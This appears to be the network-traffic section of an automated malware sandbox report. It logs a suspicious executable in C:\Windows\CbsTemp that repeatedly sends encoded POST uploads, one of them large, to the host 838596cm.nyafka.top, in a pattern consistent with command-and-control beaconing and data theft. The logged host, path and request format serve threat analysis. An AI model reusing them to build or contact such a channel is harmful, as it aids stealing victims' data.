                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5aPdhjS1o4flKKAWhojw7384aZrePGXeoKnZFVSrQB6dFaA1BMZSd26vLNmX8fXBfj3dF15SOKF37q5imLjLcft6YHQE1DbqGgewwRUY7P3mrSNsDY3KcRuwCjMx6jxbc1nPbHQi"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed78e47aad727b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8080&min_rtt=1907&rtt_var=11719&sent=7&recv=10&lost=0&retrans=0&sent_bytes=1005&recv_bytes=4998&delivery_rate=1478481&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          3192.168.2.549874104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:12:59.841362953 CET325OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Jan 8, 2025 17:13:00.192353010 CET2532OUTData Raw: 50 55 5b 52 5c 5b 53 5b 5e 5f 57 54 56 59 59 59 57 50 58 5c 50 5b 56 59 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PU[R\[S[^_WTVYYYWPX\P[VY[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ [<Y'01)/' >5>;X&8.<!$*["=-?#_&'P-
                                                                                                          Jan 8, 2025 17:13:00.304465055 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:00.563951969 CET810INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:00 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kMx3AEDMeAS0jApE9iLXuyITs8Eo6Jukr9Yt7dFoTZP09epWkdJZYXHY7%2FFigSFVZ5qR%2Bwl9S3Qy8Xmz0CgQC%2Ffq3LqAn5zNuCeKNy0%2FC0%2FHZYJbOquavLxONRuaMS3m%2BsDz3SY6"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed78ec9df0424b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3382&min_rtt=1654&rtt_var=4077&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2857&delivery_rate=94290&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          4192.168.2.549881104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:01.364475012 CET325OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Jan 8, 2025 17:13:01.724065065 CET2532OUTData Raw: 50 55 5e 57 59 5e 56 5a 5e 5f 57 54 56 57 59 5c 57 56 58 5e 50 59 56 50 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PU^WY^VZ^_WTVWY\WVX^PYVP[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ X(;4$ -?.:/7#?-5^>\$;"Q((>Y<"[<-#_&'P-
                                                                                                          Jan 8, 2025 17:13:01.828187943 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:02.078200102 CET815INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:02 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mzx%2Bu0K5DhUVV%2B%2FgQB%2B%2BdsPKkGT0YEhBv4RpOIrHQubOSXtiUS7d1QxNDGtbbcox7Mzee%2F%2F1%2FaeQDn3sLG4bPCsNtQQgDvJyqbBJ8EftJ6ouF16BxqMV69RqmAEeIkngpczdVKnJ"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed78f61bdd727b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=6652&min_rtt=1940&rtt_var=10151&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2857&delivery_rate=36834&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          5192.168.2.549888104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:02.558707952 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          6192.168.2.549889104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:02.663609982 CET351OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 268532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:03.020422935 CET12360OUTData Raw: 55 53 5e 5f 5c 5a 56 5e 5e 5f 57 54 56 5f 59 59 57 5e 58 53 50 55 56 5c 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: US^_\ZV^^_WTV_YYW^XSPUV\[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ Y+++Y00%>1;4?>.%^>5$]-+1?)?4]"8-?#_&'P-#
                                                                                                          Jan 8, 2025 17:13:03.025376081 CET2472OUTData Raw: 0d 07 39 0d 34 03 02 11 04 32 3e 56 32 00 19 3c 06 3b 30 1e 30 01 16 54 3e 3d 23 3a 00 17 3c 03 0d 30 39 52 0a 22 43 5a 0f 36 23 2f 26 07 1a 2a 36 5b 2e 21 3b 1d 22 28 3b 3e 30 23 08 09 34 3d 23 30 23 55 31 27 23 10 3f 3d 01 42 28 56 22 37 3c 1c
                                                                                                          Data Ascii: 942>V2<;00T>=#:<09R"CZ6#/&*6[.!;"(;>0#4=#0#U1'#?=B(V"7<%-85Q=($:)8.;<::;44$#X:43U&"[E*$?-@2'<55VX<+09,:#6C72;0148>5_@0(==2U;$,\9_Q<6<7"=1:,9/<!+*^+10.3=T?>?*
                                                                                                          Jan 8, 2025 17:13:03.025391102 CET2472OUTData Raw: 3e 54 0e 11 03 5b 35 1a 39 35 2d 40 2e 34 29 5c 28 23 59 52 09 21 01 1e 09 27 2e 2a 28 5c 1e 06 07 23 29 24 30 00 50 11 0a 42 23 1d 09 3e 23 3f 20 5b 32 04 34 5d 26 1f 0c 0f 2c 57 2b 30 2b 24 05 21 23 5d 26 24 21 1d 31 07 39 5a 3b 21 0b 10 0a 0d
                                                                                                          Data Ascii: >T[595-@.4)\(#YR!'.*(\#)$0PB#>#? [24]&,W+0+$!#]&$!19Z;!,Z&8#_[W.!&Q4$Y(R/2': ?>H)-),^<3 :;%;_>^>,2[ =W<S00"< 6B2#081 "6^060?>0BY&8+]>_%,8Z6; 0T")>0*-8)+$!T+),$[<
                                                                                                          Jan 8, 2025 17:13:03.025429964 CET2472OUTData Raw: 31 1e 0b 5d 0a 26 25 1b 24 5c 06 23 0a 3a 08 20 3e 1a 22 1f 0b 2b 23 21 25 06 34 28 3d 21 09 17 0c 2d 24 1d 28 29 2c 3b 09 56 03 38 22 2d 3d 59 38 25 53 5d 13 00 1c 5a 35 29 36 3d 08 2a 13 0b 34 23 3c 25 02 2d 2b 08 0b 31 3c 58 2d 07 02 2b 29 27
                                                                                                          Data Ascii: 1]&%$\#: >"+#!%4(=!-$(),;V8"-=Y8%S]Z5)6=*4#<%-+1<X-+)'E4<R31<%=!?]%79^17<0&_"09 _3._583<1<-4[]<(>$#3?'\0&(*7)<"]9$!7;48%#8[66R;]6'#\:_+>!718,!-$:1 [+(=?6>Q#6!2 '
                                                                                                          Jan 8, 2025 17:13:03.025440931 CET2472OUTData Raw: 0f 30 27 08 3b 10 5b 1b 0a 5d 5f 15 3a 5f 0d 55 32 23 2d 2b 01 34 3b 3f 3c 37 24 59 0b 25 30 57 3f 2a 02 12 32 01 24 2f 0d 0b 07 34 23 1e 01 1b 0f 32 50 5c 21 3f 27 53 22 2c 59 3c 3f 0a 1f 57 0c 33 01 17 09 57 28 5f 27 30 33 29 28 42 23 25 3f 5b
                                                                                                          Data Ascii: 0';[]_:_U2#-+4;?<7$Y%0W?*2$/4#2P\!?'S",Y<?W3W(_'03)(B#%?[,2Q5%=_(*%>S&:;.17],#] Y <,*=X3]2/_(="R 77_Y>.6=_ER5.0>3;#9,?_,?S6&?</T(V0;5>9-)5$%1,<W'=/Z9'.<1$.\2QX;[ Z;-:(15Y(?2#
                                                                                                          Jan 8, 2025 17:13:03.025491953 CET2472OUTData Raw: 03 0b 57 0b 3c 5a 37 30 32 30 0e 22 29 59 17 1e 3d 5e 29 1d 31 2a 0b 0f 30 31 37 29 0b 59 37 01 0f 28 1c 15 06 29 5b 1f 35 1d 25 05 34 25 3f 27 27 37 3b 3b 32 3d 15 23 22 3f 0c 1c 07 5c 5d 3c 24 18 3b 51 37 2d 02 5b 3b 0a 05 1a 28 3b 3e 37 3e 01
                                                                                                          Data Ascii: W<Z7020")Y=^)1*017)Y7()[5%4%?''7;;2=#"?\]<$;Q7-[;(;>7>5*?2>1;-<1,?S<_,17>34"=#R6)053-6$/>.W*+W9W,=!V_2?*(?0.<U]?$%^+((&17."2:3<?!4!:)7?75<:?-')>X:^+!S
                                                                                                          Jan 8, 2025 17:13:03.025515079 CET2472OUTData Raw: 06 2e 28 01 2a 30 03 5b 3c 35 03 0e 3d 3b 3d 22 11 01 38 1c 0d 2a 26 36 0e 1e 3e 26 0d 2a 2f 5c 3a 28 38 3d 20 02 1e 5e 3e 3f 01 1a 32 00 02 5b 08 30 21 24 15 07 36 13 33 41 30 26 11 03 04 23 35 2c 49 2c 0a 04 2d 1b 3f 1f 19 1b 03 3e 1d 24 3d 59
                                                                                                          Data Ascii: .(*0[<5=;="8*&6>&*/\:(8= ^>?2[0!$63A0&#5,I,-?>$=Y_\]01^ >+%(T$*062\6_!0T37:!6?10Z098&%'</["/:]&:+?8>#")16-.$!=/'X30:/W2#W3$4"?+.0_:)!8$:%$'P5>][9#2
                                                                                                          Jan 8, 2025 17:13:03.025540113 CET2472OUTData Raw: 2b 2c 52 35 33 22 0c 1b 24 22 15 5f 32 21 20 00 24 38 5b 54 0b 2a 53 0d 36 2f 31 50 33 5c 11 5a 06 37 0d 18 0d 01 3c 1c 3b 03 3f 18 01 35 3c 20 22 20 18 54 38 31 16 3e 3b 41 05 1e 22 13 20 2f 3a 2d 3e 5b 38 22 26 25 3a 0a 2c 54 3e 2f 33 5c 10 23
                                                                                                          Data Ascii: +,R53"$"_2! $8[T*S6/1P3\Z7<;?5< " T81>;A" /:->[8"&%:,T>/3\#+07/4)YD1Z=5V*0^>].:\]$&;%+U\:8U;(7;=<2+&W%;Z)[.4%2(,]:^1W')7$ .-*0(6)% =))2S$0Z)>%+1'/^7<1P":5T28(*"-_Q&A<<01:.=Y16:,
                                                                                                          Jan 8, 2025 17:13:03.025573015 CET2472OUTData Raw: 39 2e 5b 05 35 01 5b 20 05 26 2d 00 0c 3d 5c 2e 01 22 16 18 38 21 21 1d 3e 38 25 36 2e 3a 32 5b 07 57 2b 3c 3d 03 2b 3a 21 5d 22 0b 28 03 30 3f 31 20 13 19 35 06 5c 59 0d 28 33 07 0a 2f 28 5d 22 2d 32 58 33 24 3e 1d 26 35 30 13 2b 30 05 10 34 33
                                                                                                          Data Ascii: 9.[5[ &-=\."8!!>8%6.:2[W+<=+:!]"(0?1 5\Y(3/(]"-2X3$>&50+043? \./#%'=V0!'\<+<^!##=.]#*4#\=Y@:5"1948!#/!$5=8)!38/,&\)(3-/U]>$=<=^"]$_><>)[^U;$83]5X+9#"Y$1&S?9I82
                                                                                                          Jan 8, 2025 17:13:03.025609970 CET4944OUTData Raw: 26 32 33 36 00 27 23 36 30 06 3f 42 00 31 3a 27 32 37 21 0e 08 2a 2d 33 3d 00 12 59 32 14 25 52 24 43 26 25 26 38 3f 09 0d 28 20 32 0a 3a 5e 1c 0a 07 23 5b 33 5e 12 38 30 3f 25 03 22 07 22 3d 05 1b 34 18 3d 3f 26 5c 2b 5c 18 1f 27 5e 0f 2c 04 55
                                                                                                          Data Ascii: &236'#60?B1:'27!*-3=Y2%R$C&%&8?( 2:^#[3^80?%""=4=?&\+\'^,U5).#0[[^*_4==.;)<$,,98<SD6)^53;"'6#*)[0*4^^?>$A;<3Y!X2*4'76"/X')PS)>5<T-9U+=8%?4,4#96,]+6<Z'U-'/.,/T*T #+[60,>=
                                                                                                          Jan 8, 2025 17:13:03.135267973 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:04.543487072 CET819INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:04 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n0LkuB7h1N%2BSa7ardvgWVEqnjbN7JpVJLHcuq%2Fq4%2FvNYJJsGplryaCWjal%2F56ZOIb%2FzC8fGfwkXSTdmo6KgVUy3rVIUTDw719%2BS9l2Gc%2FZYJM3Z7lPtkcmrNoWp9nBCXYbGXR0FS"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed78fe4a9f43b3-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2082&min_rtt=1614&rtt_var=1541&sent=119&recv=267&lost=0&retrans=0&sent_bytes=25&recv_bytes=268883&delivery_rate=272438&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0
                                                                                                          Jan 8, 2025 17:13:04.544051886 CET325OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Jan 8, 2025 17:13:04.639364958 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:04.901880026 CET821INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:04 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1MoLaNtunUIimD6YX7OfsQzHMbbwuQKlwDobbqeiJu7J96ZPpk9tylYP6eRD91UY1YCByvw%2FkxZezO%2FYg27M%2B%2FILd7PzppnIxe1Hdy9IqXQ0d28Mp%2FFZH4oB%2BVhAyPK%2FYEvKqDwM"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7907b85c43b3-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4579&min_rtt=1517&rtt_var=6083&sent=125&recv=273&lost=0&retrans=0&sent_bytes=869&recv_bytes=271740&delivery_rate=1851616&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          7192.168.2.549894104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:03.096029997 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:03.442147970 CET2532OUTData Raw: 55 53 5e 55 59 59 53 5f 5e 5f 57 54 56 59 59 5d 57 52 58 52 50 5c 56 50 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: US^UYYS_^_WTVYY]WRXRP\VP[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ _('Y0&=>!/#[*-">;%[$(9(1?>!<-#_&'P-
                                                                                                          Jan 8, 2025 17:13:03.604185104 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:03.834062099 CET803INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:03 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P4Ry3U4GR93Mxq%2FvMbq11Em3ZIbmgpsHiEfZ2bSS1ybj3miZRUQQAXJ%2FPCHIJQQzhDsgGbXoduAqWkT4s0GdtoVqm9K2l8RPR7U9aGbLa5fvoFp1UBAZEYIhIO7UeuRRXDvYkMUw"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed79013f23c34f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2803&min_rtt=1504&rtt_var=3162&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=122720&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0
                                                                                                          Jan 8, 2025 17:13:03.870852947 CET325OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 1852
                                                                                                          Expect: 100-continue
                                                                                                          Jan 8, 2025 17:13:03.968310118 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:03.968774080 CET1852OUTData Raw: 55 5d 5b 57 59 59 53 59 5e 5f 57 54 56 56 59 5e 57 51 58 59 50 54 56 59 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: U][WYYSY^_WTVVY^WQXYPTVY[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ Z+^ '3>[)[&/4Z>->)5';9(0=?4[5-7-#_&'P-
                                                                                                          Jan 8, 2025 17:13:04.222570896 CET957INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:04 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=myQIDSfEALtyHS2V6wIIlFrRzZLTo6PYLQ49Ck1Vnei3%2B13k%2BiGPArH31nAju5ReEhmAuL7vSo0ECdiP6ZQ9FqbhDh2VnrmCzjOPad62FNzW1IeVp%2Bo7Jy8ViE8pFkPAySD3SKcx"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed790379a8c34f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=5172&min_rtt=1504&rtt_var=7060&sent=6&recv=11&lost=0&retrans=0&sent_bytes=853&recv_bytes=5058&delivery_rate=1867007&cwnd=183&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 39 38 0d 0a 03 1d 27 0a 27 13 28 5f 23 15 03 54 3c 5c 3f 5e 3d 0d 3d 00 2e 39 06 59 25 42 2f 00 26 3c 37 00 34 01 0c 02 2b 01 36 03 24 35 38 1d 2b 2b 20 5c 04 1f 27 04 3c 38 29 56 3d 59 26 5f 27 23 3a 04 31 0d 0a 5b 31 13 27 1e 24 39 21 0f 37 07 3b 54 2c 23 31 08 3a 01 3c 58 3f 37 37 01 24 14 2f 50 0f 10 38 1a 2d 2a 27 5d 22 0f 2a 53 22 55 3b 1e 20 25 2c 59 29 03 01 50 21 06 21 17 30 23 29 19 20 0c 2c 0c 25 33 0a 04 3f 1f 3c 53 2b 33 24 55 2c 02 2c 49 02 3f 58 52 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 98''(_#T<\?^==.9Y%B/&<74+6$58++ \'<8)V=Y&_'#:1[1'$9!7;T,#1:<X?77$/P8-*']"*S"U; %,Y)P!!0#) ,%3?<S+3$U,,I?XR0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          8192.168.2.549906104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:05.501537085 CET325OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Jan 8, 2025 17:13:05.849071026 CET2532OUTData Raw: 55 50 5e 54 59 5c 53 5c 5e 5f 57 54 56 5a 59 53 57 55 58 5d 50 5d 56 51 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UP^TY\S\^_WTVZYSWUX]P]VQ[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ ^<;#3")=!\/ ?>2(+)[':)"#Y)/ -?9#_&'P-7
                                                                                                          Jan 8, 2025 17:13:05.945871115 CET25INHTTP/1.1 100 Continue
